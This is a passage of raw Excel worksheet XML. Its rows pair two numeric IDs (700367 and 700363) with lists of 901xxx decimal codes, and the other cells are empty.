    </row>
    <row r="1996" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1996" s="5">
        <v>700367</v>
      </c>
      <c r="B1996" s="3">
        <v>901087.00300000003</v>
      </c>
      <c r="D1996" s="5"/>
      <c r="E1996" s="3"/>
      <c r="F1996" s="1"/>
      <c r="H1996" s="1"/>
    </row>
    <row r="1997" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1997" s="5">
        <v>700367</v>
      </c>
      <c r="B1997" s="3">
        <v>901560</v>
      </c>
      <c r="D1997" s="5"/>
      <c r="E1997" s="3"/>
      <c r="F1997" s="1"/>
      <c r="H1997" s="1"/>
    </row>
    <row r="1998" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1998" s="5">
        <v>700367</v>
      </c>
      <c r="B1998" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D1998" s="5"/>
      <c r="E1998" s="3"/>
      <c r="F1998" s="1"/>
      <c r="H1998" s="1"/>
    </row>
    <row r="1999" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1999" s="5">
        <v>700367</v>
      </c>
      <c r="B1999" s="3">
        <v>901110.00100000005</v>
      </c>
      <c r="D1999" s="5"/>
      <c r="E1999" s="3"/>
      <c r="F1999" s="1"/>
      <c r="H1999" s="1"/>
    </row>
    <row r="2000" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2000" s="5">
        <v>700367</v>
      </c>
      <c r="B2000" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D2000" s="5"/>
      <c r="E2000" s="3"/>
      <c r="F2000" s="1"/>
      <c r="H2000" s="1"/>
    </row>
    <row r="2001" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2001" s="5">
        <v>700367</v>
      </c>
      <c r="B2001" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2001" s="5"/>
      <c r="E2001" s="3"/>
      <c r="F2001" s="1"/>
      <c r="H2001" s="1"/>
    </row>
    <row r="2002" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2002" s="5">
        <v>700367</v>
      </c>
      <c r="B2002" s="3">
        <v>901059.005</v>
      </c>
      <c r="D2002" s="5"/>
      <c r="E2002" s="3"/>
      <c r="F2002" s="1"/>
      <c r="H2002" s="1"/>
    </row>
    <row r="2003" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2003" s="5">
        <v>700367</v>
      </c>
      <c r="B2003" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D2003" s="5"/>
      <c r="E2003" s="3"/>
      <c r="F2003" s="1"/>
      <c r="H2003" s="1"/>
    </row>
    <row r="2004" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2004" s="5">
        <v>700367</v>
      </c>
      <c r="B2004" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D2004" s="5"/>
      <c r="E2004" s="3"/>
      <c r="F2004" s="1"/>
      <c r="H2004" s="1"/>
    </row>
    <row r="2005" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2005" s="5">
        <v>700367</v>
      </c>
      <c r="B2005" s="3">
        <v>901114.00100000005</v>
      </c>
      <c r="D2005" s="5"/>
      <c r="E2005" s="3"/>
      <c r="F2005" s="1"/>
      <c r="H2005" s="1"/>
    </row>
    <row r="2006" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2006" s="5">
        <v>700367</v>
      </c>
      <c r="B2006" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D2006" s="5"/>
      <c r="E2006" s="3"/>
      <c r="F2006" s="1"/>
      <c r="H2006" s="1"/>
    </row>
    <row r="2007" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2007" s="5">
        <v>700367</v>
      </c>
      <c r="B2007" s="3">
        <v>901041</v>
      </c>
      <c r="D2007" s="5"/>
      <c r="E2007" s="3"/>
      <c r="F2007" s="1"/>
      <c r="H2007" s="1"/>
    </row>
    <row r="2008" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2008" s="5">
        <v>700367</v>
      </c>
      <c r="B2008" s="3">
        <v>901210</v>
      </c>
      <c r="D2008" s="5"/>
      <c r="E2008" s="3"/>
      <c r="F2008" s="1"/>
      <c r="H2008" s="1"/>
    </row>
    <row r="2009" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2009" s="5">
        <v>700367</v>
      </c>
      <c r="B2009" s="3">
        <v>901040</v>
      </c>
      <c r="D2009" s="5"/>
      <c r="E2009" s="3"/>
      <c r="F2009" s="1"/>
      <c r="H2009" s="1"/>
    </row>
    <row r="2010" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2010" s="5">
        <v>700367</v>
      </c>
      <c r="B2010" s="3">
        <v>901571</v>
      </c>
      <c r="D2010" s="5"/>
      <c r="E2010" s="3"/>
      <c r="F2010" s="1"/>
      <c r="H2010" s="1"/>
    </row>
    <row r="2011" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2011" s="5">
        <v>700367</v>
      </c>
      <c r="B2011" s="3">
        <v>901027</v>
      </c>
      <c r="D2011" s="5"/>
      <c r="E2011" s="3"/>
      <c r="F2011" s="1"/>
      <c r="H2011" s="1"/>
    </row>
    <row r="2012" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2012" s="5">
        <v>700367</v>
      </c>
      <c r="B2012" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D2012" s="5"/>
      <c r="E2012" s="3"/>
      <c r="F2012" s="1"/>
      <c r="H2012" s="1"/>
    </row>
    <row r="2013" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2013" s="5">
        <v>700367</v>
      </c>
      <c r="B2013" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D2013" s="5"/>
      <c r="E2013" s="3"/>
      <c r="F2013" s="1"/>
      <c r="H2013" s="1"/>
    </row>
    <row r="2014" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2014" s="5">
        <v>700367</v>
      </c>
      <c r="B2014" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D2014" s="5"/>
      <c r="E2014" s="3"/>
      <c r="F2014" s="1"/>
      <c r="H2014" s="1"/>
    </row>
    <row r="2015" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2015" s="5">
        <v>700367</v>
      </c>
      <c r="B2015" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D2015" s="5"/>
      <c r="E2015" s="3"/>
      <c r="F2015" s="1"/>
      <c r="H2015" s="1"/>
    </row>
    <row r="2016" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2016" s="5">
        <v>700367</v>
      </c>
      <c r="B2016" s="3">
        <v>901057</v>
      </c>
      <c r="D2016" s="5"/>
      <c r="E2016" s="3"/>
      <c r="F2016" s="1"/>
      <c r="H2016" s="1"/>
    </row>
    <row r="2017" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2017" s="5">
        <v>700367</v>
      </c>
      <c r="B2017" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D2017" s="5"/>
      <c r="E2017" s="3"/>
      <c r="F2017" s="1"/>
      <c r="H2017" s="1"/>
    </row>
    <row r="2018" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2018" s="5">
        <v>700367</v>
      </c>
      <c r="B2018" s="3">
        <v>901021.00199999998</v>
      </c>
      <c r="D2018" s="5"/>
      <c r="E2018" s="3"/>
      <c r="F2018" s="1"/>
      <c r="H2018" s="1"/>
    </row>
    <row r="2019" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2019" s="5">
        <v>700367</v>
      </c>
      <c r="B2019" s="3">
        <v>901053.005</v>
      </c>
      <c r="D2019" s="5"/>
      <c r="E2019" s="3"/>
      <c r="F2019" s="1"/>
      <c r="H2019" s="1"/>
    </row>
    <row r="2020" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2020" s="5">
        <v>700367</v>
      </c>
      <c r="B2020" s="3">
        <v>901552.00100000005</v>
      </c>
      <c r="D2020" s="5"/>
      <c r="E2020" s="3"/>
      <c r="F2020" s="1"/>
      <c r="H2020" s="1"/>
    </row>
    <row r="2021" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2021" s="5">
        <v>700367</v>
      </c>
      <c r="B2021" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D2021" s="5"/>
      <c r="E2021" s="3"/>
      <c r="F2021" s="1"/>
      <c r="H2021" s="1"/>
    </row>
    <row r="2022" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2022" s="5">
        <v>700367</v>
      </c>
      <c r="B2022" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D2022" s="5"/>
      <c r="E2022" s="3"/>
      <c r="F2022" s="1"/>
      <c r="H2022" s="1"/>
    </row>
    <row r="2023" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2023" s="5">
        <v>700367</v>
      </c>
      <c r="B2023" s="3">
        <v>901078.00300000003</v>
      </c>
      <c r="D2023" s="5"/>
      <c r="E2023" s="3"/>
      <c r="F2023" s="1"/>
      <c r="H2023" s="1"/>
    </row>
    <row r="2024" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2024" s="5">
        <v>700367</v>
      </c>
      <c r="B2024" s="3">
        <v>901047</v>
      </c>
      <c r="D2024" s="5"/>
      <c r="E2024" s="3"/>
      <c r="F2024" s="1"/>
      <c r="H2024" s="1"/>
    </row>
    <row r="2025" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2025" s="5">
        <v>700363</v>
      </c>
      <c r="B2025" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D2025" s="5"/>
      <c r="E2025" s="3"/>
      <c r="F2025" s="1"/>
      <c r="H2025" s="1"/>
    </row>
    <row r="2026" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2026" s="5">
        <v>700363</v>
      </c>
      <c r="B2026" s="3">
        <v>901134</v>
      </c>
      <c r="D2026" s="5"/>
      <c r="E2026" s="3"/>
      <c r="F2026" s="1"/>
      <c r="H2026" s="1"/>
    </row>
    <row r="2027" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2027" s="5">
        <v>700363</v>
      </c>
      <c r="B2027" s="3">
        <v>901134.00199999998</v>
      </c>
      <c r="D2027" s="5"/>
      <c r="E2027" s="3"/>
      <c r="F2027" s="1"/>
      <c r="H2027" s="1"/>
    </row>
    <row r="2028" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2028" s="5">
        <v>700363</v>
      </c>
      <c r="B2028" s="3">
        <v>901134.005</v>
      </c>
      <c r="D2028" s="5"/>
      <c r="E2028" s="3"/>
      <c r="F2028" s="1"/>
      <c r="H2028" s="1"/>
    </row>
    <row r="2029" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2029" s="5">
        <v>700363</v>
      </c>
      <c r="B2029" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D2029" s="5"/>
      <c r="E2029" s="3"/>
      <c r="F2029" s="1"/>
      <c r="H2029" s="1"/>
    </row>
    <row r="2030" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2030" s="5">
        <v>700363</v>
      </c>
      <c r="B2030" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D2030" s="5"/>
      <c r="E2030" s="3"/>
      <c r="F2030" s="1"/>
      <c r="H2030" s="1"/>
    </row>
    <row r="2031" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2031" s="5">
        <v>700363</v>
      </c>
      <c r="B2031" s="3">
        <v>901557.00100000005</v>
      </c>
      <c r="D2031" s="5"/>
      <c r="E2031" s="3"/>
      <c r="F2031" s="1"/>
      <c r="H2031" s="1"/>
    </row>
    <row r="2032" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2032" s="5">
        <v>700363</v>
      </c>
      <c r="B2032" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2032" s="5"/>
      <c r="E2032" s="3"/>
      <c r="F2032" s="1"/>
      <c r="H2032" s="1"/>
    </row>
    <row r="2033" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2033" s="5">
        <v>700363</v>
      </c>
      <c r="B2033" s="3">
        <v>901560</v>
      </c>
      <c r="D2033" s="5"/>
      <c r="E2033" s="3"/>
      <c r="F2033" s="1"/>
      <c r="H2033" s="1"/>
    </row>
    <row r="2034" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2034" s="5">
        <v>700363</v>
      </c>
      <c r="B2034" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2034" s="5"/>
      <c r="E2034" s="3"/>
      <c r="F2034" s="1"/>
      <c r="H2034" s="1"/>
    </row>
    <row r="2035" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2035" s="5">
        <v>700363</v>
      </c>
      <c r="B2035" s="3">
        <v>901547.005</v>
      </c>
      <c r="D2035" s="5"/>
      <c r="E2035" s="3"/>
      <c r="F2035" s="1"/>
      <c r="H2035" s="1"/>
    </row>
    <row r="2036" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2036" s="5">
        <v>700363</v>
      </c>
      <c r="B2036" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D2036" s="5"/>
      <c r="E2036" s="3"/>
      <c r="F2036" s="1"/>
      <c r="H2036" s="1"/>
    </row>
    <row r="2037" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2037" s="5">
        <v>700363</v>
      </c>
      <c r="B2037" s="3">
        <v>901217</v>
      </c>
      <c r="D2037" s="5"/>
      <c r="E2037" s="3"/>
      <c r="F2037" s="1"/>
      <c r="H2037" s="1"/>
    </row>
    <row r="2038" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2038" s="5">
        <v>700363</v>
      </c>
      <c r="B2038" s="3">
        <v>901115</v>
      </c>
      <c r="D2038" s="5"/>
      <c r="E2038" s="3"/>
      <c r="F2038" s="1"/>
      <c r="H2038" s="1"/>
    </row>
    <row r="2039" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2039" s="5">
        <v>700363</v>
      </c>
      <c r="B2039" s="3">
        <v>901059</v>
      </c>
      <c r="D2039" s="5"/>
      <c r="E2039" s="3"/>
      <c r="F2039" s="1"/>
      <c r="H2039" s="1"/>
    </row>
    <row r="2040" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2040" s="5">
        <v>700363</v>
      </c>
      <c r="B2040" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D2040" s="5"/>
      <c r="E2040" s="3"/>
      <c r="F2040" s="1"/>
      <c r="H2040" s="1"/>
    </row>
    <row r="2041" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2041" s="5">
        <v>700363</v>
      </c>
      <c r="B2041" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2041" s="5"/>
      <c r="E2041" s="3"/>
      <c r="F2041" s="1"/>
      <c r="H2041" s="1"/>
    </row>
    <row r="2042" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2042" s="5">
        <v>700363</v>
      </c>
      <c r="B2042" s="3">
        <v>901136.00100000005</v>
      </c>
      <c r="D2042" s="5"/>
      <c r="E2042" s="3"/>
      <c r="F2042" s="1"/>
      <c r="H2042" s="1"/>
    </row>
    <row r="2043" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2043" s="5">
        <v>700363</v>
      </c>
      <c r="B2043" s="3">
        <v>901136.00199999998</v>
      </c>
      <c r="D2043" s="5"/>
      <c r="E2043" s="3"/>
      <c r="F2043" s="1"/>
      <c r="H2043" s="1"/>
    </row>
    <row r="2044" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2044" s="5">
        <v>700363</v>
      </c>
      <c r="B2044" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D2044" s="5"/>
      <c r="E2044" s="3"/>
      <c r="F2044" s="1"/>
      <c r="H2044" s="1"/>
    </row>
    <row r="2045" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2045" s="5">
        <v>700363</v>
      </c>
      <c r="B2045" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D2045" s="5"/>
      <c r="E2045" s="3"/>
      <c r="F2045" s="1"/>
      <c r="H2045" s="1"/>
    </row>
    <row r="2046" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2046" s="5">
        <v>700363</v>
      </c>
      <c r="B2046" s="3">
        <v>901484.00100000005</v>
      </c>
      <c r="D2046" s="5"/>
      <c r="E2046" s="3"/>
      <c r="F2046" s="1"/>
      <c r="H2046" s="1"/>
    </row>
    <row r="2047" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2047" s="5">
        <v>700363</v>
      </c>
      <c r="B2047" s="3">
        <v>901482</v>
      </c>
      <c r="D2047" s="5"/>
      <c r="E2047" s="3"/>
      <c r="F2047" s="1"/>
      <c r="H2047" s="1"/>
    </row>
    <row r="2048" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2048" s="5">
        <v>700363</v>
      </c>
      <c r="B2048" s="3">
        <v>901114.00100000005</v>
      </c>
      <c r="D2048" s="5"/>
      <c r="E2048" s="3"/>
      <c r="F2048" s="1"/>
      <c r="H2048" s="1"/>
    </row>
    <row r="2049" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2049" s="5">
        <v>700363</v>
      </c>
      <c r="B2049" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D2049" s="5"/>
      <c r="E2049" s="3"/>
      <c r="F2049" s="1"/>
      <c r="H2049" s="1"/>
    </row>
    <row r="2050" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2050" s="5">
        <v>700363</v>
      </c>
      <c r="B2050" s="3">
        <v>901546.00800000003</v>
      </c>
      <c r="D2050" s="5"/>
      <c r="E2050" s="3"/>
      <c r="F2050" s="1"/>
      <c r="H2050" s="1"/>
    </row>
    <row r="2051" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2051" s="5">
        <v>700363</v>
      </c>
      <c r="B2051" s="3">
        <v>901041</v>
      </c>
      <c r="D2051" s="5"/>
      <c r="E2051" s="3"/>
      <c r="F2051" s="1"/>
      <c r="H2051" s="1"/>
    </row>
    <row r="2052" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2052" s="5">
        <v>700363</v>
      </c>
      <c r="B2052" s="3">
        <v>901567.00100000005</v>
      </c>
      <c r="D2052" s="5"/>
      <c r="E2052" s="3"/>
      <c r="F2052" s="1"/>
      <c r="H2052" s="1"/>
    </row>
    <row r="2053" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2053" s="5">
        <v>700363</v>
      </c>
      <c r="B2053" s="3">
        <v>901567.00199999998</v>
      </c>
      <c r="D2053" s="5"/>
      <c r="E2053" s="3"/>
      <c r="F2053" s="1"/>
      <c r="H2053" s="1"/>
    </row>
    <row r="2054" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2054" s="5">
        <v>700363</v>
      </c>
      <c r="B2054" s="3">
        <v>901068</v>
      </c>
      <c r="D2054" s="5"/>
      <c r="E2054" s="3"/>
      <c r="F2054" s="1"/>
      <c r="H2054" s="1"/>
    </row>
    <row r="2055" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2055" s="5">
        <v>700363</v>
      </c>
      <c r="B2055" s="3">
        <v>901210</v>
      </c>
      <c r="D2055" s="5"/>
      <c r="E2055" s="3"/>
      <c r="F2055" s="1"/>
      <c r="H2055" s="1"/>
    </row>
    <row r="2056" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2056" s="5">
        <v>700363</v>
      </c>
      <c r="B2056" s="3">
        <v>901083</v>
      </c>
      <c r="D2056" s="5"/>
      <c r="E2056" s="3"/>
      <c r="F2056" s="1"/>
      <c r="H2056" s="1"/>
    </row>
    <row r="2057" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2057" s="5">
        <v>700363</v>
      </c>
      <c r="B2057" s="3">
        <v>901615</v>
      </c>
      <c r="D2057" s="5"/>
      <c r="E2057" s="3"/>
      <c r="F2057" s="1"/>
      <c r="H2057" s="1"/>
    </row>
    <row r="2058" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2058" s="5">
        <v>700363</v>
      </c>
      <c r="B2058" s="3">
        <v>901574.00100000005</v>
      </c>
      <c r="D2058" s="5"/>
      <c r="E2058" s="3"/>
      <c r="F2058" s="1"/>
      <c r="H2058" s="1"/>
    </row>
    <row r="2059" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2059" s="5">
        <v>700363</v>
      </c>
      <c r="B2059" s="3">
        <v>901574.00399999996</v>
      </c>
      <c r="D2059" s="5"/>
      <c r="E2059" s="3"/>
      <c r="F2059" s="1"/>
      <c r="H2059" s="1"/>
    </row>
    <row r="2060" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2060" s="5">
        <v>700363</v>
      </c>
      <c r="B2060" s="3">
        <v>901574.00699999998</v>
      </c>
      <c r="D2060" s="5"/>
      <c r="E2060" s="3"/>
      <c r="F2060" s="1"/>
      <c r="H2060" s="1"/>
    </row>
    <row r="2061" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2061" s="5">
        <v>700363</v>
      </c>
      <c r="B2061" s="3">
        <v>901574.00800000003</v>
      </c>
      <c r="D2061" s="5"/>
      <c r="E2061" s="3"/>
      <c r="F2061" s="1"/>
      <c r="H2061" s="1"/>
    </row>
    <row r="2062" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2062" s="5">
        <v>700363</v>
      </c>
      <c r="B2062" s="3">
        <v>901574.00899999996</v>
      </c>
      <c r="D2062" s="5"/>
      <c r="E2062" s="3"/>
      <c r="F2062" s="1"/>
      <c r="H2062" s="1"/>
    </row>
    <row r="2063" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2063" s="5">
        <v>700363</v>
      </c>
      <c r="B2063" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D2063" s="5"/>
      <c r="E2063" s="3"/>
      <c r="F2063" s="1"/>
      <c r="H2063" s="1"/>
    </row>
    <row r="2064" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2064" s="5">
        <v>700363</v>
      </c>
      <c r="B2064" s="3">
        <v>901105</v>
      </c>
      <c r="D2064" s="5"/>
      <c r="E2064" s="3"/>
      <c r="F2064" s="1"/>
      <c r="H2064" s="1"/>
    </row>
    <row r="2065" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2065" s="5">
        <v>700363</v>
      </c>
      <c r="B2065" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D2065" s="5"/>
      <c r="E2065" s="3"/>
      <c r="F2065" s="1"/>
      <c r="H2065" s="1"/>
    </row>
    <row r="2066" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2066" s="5">
        <v>700363</v>
      </c>
      <c r="B2066" s="3">
        <v>901056.00399999996</v>
      </c>
      <c r="D2066" s="5"/>
      <c r="E2066" s="3"/>
      <c r="F2066" s="1"/>
      <c r="H2066" s="1"/>
    </row>
    <row r="2067" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2067" s="5">
        <v>700363</v>
      </c>
      <c r="B2067" s="3">
        <v>901106</v>
      </c>
      <c r="D2067" s="5"/>
      <c r="E2067" s="3"/>
      <c r="F2067" s="1"/>
      <c r="H2067" s="1"/>
    </row>
    <row r="2068" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2068" s="5">
        <v>700363</v>
      </c>
      <c r="B2068" s="3">
        <v>901046</v>
      </c>
      <c r="D2068" s="5"/>
      <c r="E2068" s="3"/>
      <c r="F2068" s="1"/>
      <c r="H2068" s="1"/>
    </row>
    <row r="2069" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2069" s="5">
        <v>700363</v>
      </c>
      <c r="B2069" s="3">
        <v>901135</v>
      </c>
      <c r="D2069" s="5"/>
      <c r="E2069" s="3"/>
      <c r="F2069" s="1"/>
      <c r="H2069" s="1"/>
    </row>
    <row r="2070" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2070" s="5">
        <v>700363</v>
      </c>
      <c r="B2070" s="3">
        <v>901040</v>
      </c>
      <c r="D2070" s="5"/>
      <c r="E2070" s="3"/>
      <c r="F2070" s="1"/>
      <c r="H2070" s="1"/>
    </row>
    <row r="2071" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2071" s="5">
        <v>700363</v>
      </c>
      <c r="B2071" s="3">
        <v>901027</v>
      </c>
      <c r="D2071" s="5"/>
      <c r="E2071" s="3"/>
      <c r="F2071" s="1"/>
      <c r="H2071" s="1"/>
    </row>
    <row r="2072" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2072" s="5">
        <v>700363</v>
      </c>
      <c r="B2072" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D2072" s="5"/>
      <c r="E2072" s="3"/>
      <c r="F2072" s="1"/>
      <c r="H2072" s="1"/>
    </row>
    <row r="2073" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2073" s="5">
        <v>700363</v>
      </c>
      <c r="B2073" s="3">
        <v>901057</v>
      </c>
      <c r="D2073" s="5"/>
      <c r="E2073" s="3"/>
      <c r="F2073" s="1"/>
      <c r="H2073" s="1"/>
    </row>
    <row r="2074" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2074" s="5">
        <v>700363</v>
      </c>
      <c r="B2074" s="3">
        <v>901055</v>
      </c>
      <c r="D2074" s="5"/>
      <c r="E2074" s="3"/>
      <c r="F2074" s="1"/>
      <c r="H2074" s="1"/>
    </row>
    <row r="2075" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2075" s="5">
        <v>700363</v>
      </c>
      <c r="B2075" s="3">
        <v>901021.00300000003</v>
      </c>
      <c r="D2075" s="5"/>
      <c r="E2075" s="3"/>
      <c r="F2075" s="1"/>
      <c r="H2075" s="1"/>
    </row>
    <row r="2076" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2076" s="5">
        <v>700363</v>
      </c>
      <c r="B2076" s="3">
        <v>901021.00399999996</v>
      </c>
      <c r="D2076" s="5"/>
      <c r="E2076" s="3"/>
      <c r="F2076" s="1"/>
      <c r="H2076" s="1"/>
    </row>
    <row r="2077" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2077" s="5">
        <v>700363</v>
      </c>
      <c r="B2077" s="3">
        <v>901053.005</v>
      </c>
      <c r="D2077" s="5"/>
      <c r="E2077" s="3"/>
      <c r="F2077" s="1"/>
      <c r="H2077" s="1"/>
    </row>
    <row r="2078" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2078" s="5">
        <v>700363</v>
      </c>
      <c r="B2078" s="3">
        <v>901113</v>
      </c>
      <c r="D2078" s="5"/>
      <c r="E2078" s="3"/>
      <c r="F2078" s="1"/>
      <c r="H2078" s="1"/>
    </row>
    <row r="2079" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2079" s="5">
        <v>700363</v>
      </c>
      <c r="B2079" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2079" s="5"/>
      <c r="E2079" s="3"/>
      <c r="F2079" s="1"/>
      <c r="H2079" s="1"/>
    </row>
    <row r="2080" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2080" s="5">
        <v>700363</v>
      </c>
      <c r="B2080" s="3">
        <v>901558.00100000005</v>
      </c>
      <c r="D2080" s="5"/>
      <c r="E2080" s="3"/>
      <c r="F2080" s="1"/>
      <c r="H2080" s="1"/>
    </row>
    <row r="2081" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2081" s="5">
        <v>700363</v>
      </c>
      <c r="B2081" s="3">
        <v>901558.00199999998</v>
      </c>
      <c r="D2081" s="5"/>
      <c r="E2081" s="3"/>
      <c r="F2081" s="1"/>
      <c r="H2081" s="1"/>
    </row>
    <row r="2082" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2082" s="5">
        <v>700363</v>
      </c>
      <c r="B2082" s="3">
        <v>901558.00300000003</v>
      </c>
      <c r="D2082" s="5"/>
      <c r="E2082" s="3"/>
      <c r="F2082" s="1"/>
      <c r="H2082" s="1"/>
    </row>
    <row r="2083" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2083" s="5">
        <v>700363</v>
      </c>
      <c r="B2083" s="3">
        <v>901082</v>
      </c>
      <c r="D2083" s="5"/>
      <c r="E2083" s="3"/>
      <c r="F2083" s="1"/>
      <c r="H2083" s="1"/>
    </row>
    <row r="2084" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2084" s="5">
        <v>700363</v>
      </c>
      <c r="B2084" s="3">
        <v>901016</v>
      </c>
      <c r="D2084" s="5"/>
      <c r="E2084" s="3"/>
      <c r="F2084" s="1"/>
      <c r="H2084" s="1"/>
    </row>
    <row r="2085" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2085" s="5">
        <v>700363</v>
      </c>
      <c r="B2085" s="3">
        <v>901049</v>
      </c>
      <c r="D2085" s="5"/>
      <c r="E2085" s="3"/>
      <c r="F2085" s="1"/>
      <c r="H2085" s="1"/>
    </row>
    <row r="2086" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2086" s="5">
        <v>700363</v>
      </c>
      <c r="B2086" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D2086" s="5"/>
      <c r="E2086" s="3"/>
      <c r="F2086" s="1"/>
      <c r="H2086" s="1"/>
    </row>
    <row r="2087" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2087" s="5">
        <v>700363</v>
      </c>
      <c r="B2087" s="3">
        <v>901127.00100000005</v>
      </c>
      <c r="D2087" s="5"/>
      <c r="E2087" s="3"/>
      <c r="F2087" s="1"/>
      <c r="H2087" s="1"/>
    </row>
    <row r="2088" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2088" s="5">
        <v>700363</v>
      </c>
      <c r="B2088" s="3">
        <v>901552.00100000005</v>
      </c>
      <c r="D2088" s="5"/>
      <c r="E2088" s="3"/>
      <c r="F2088" s="1"/>
      <c r="H2088" s="1"/>
    </row>
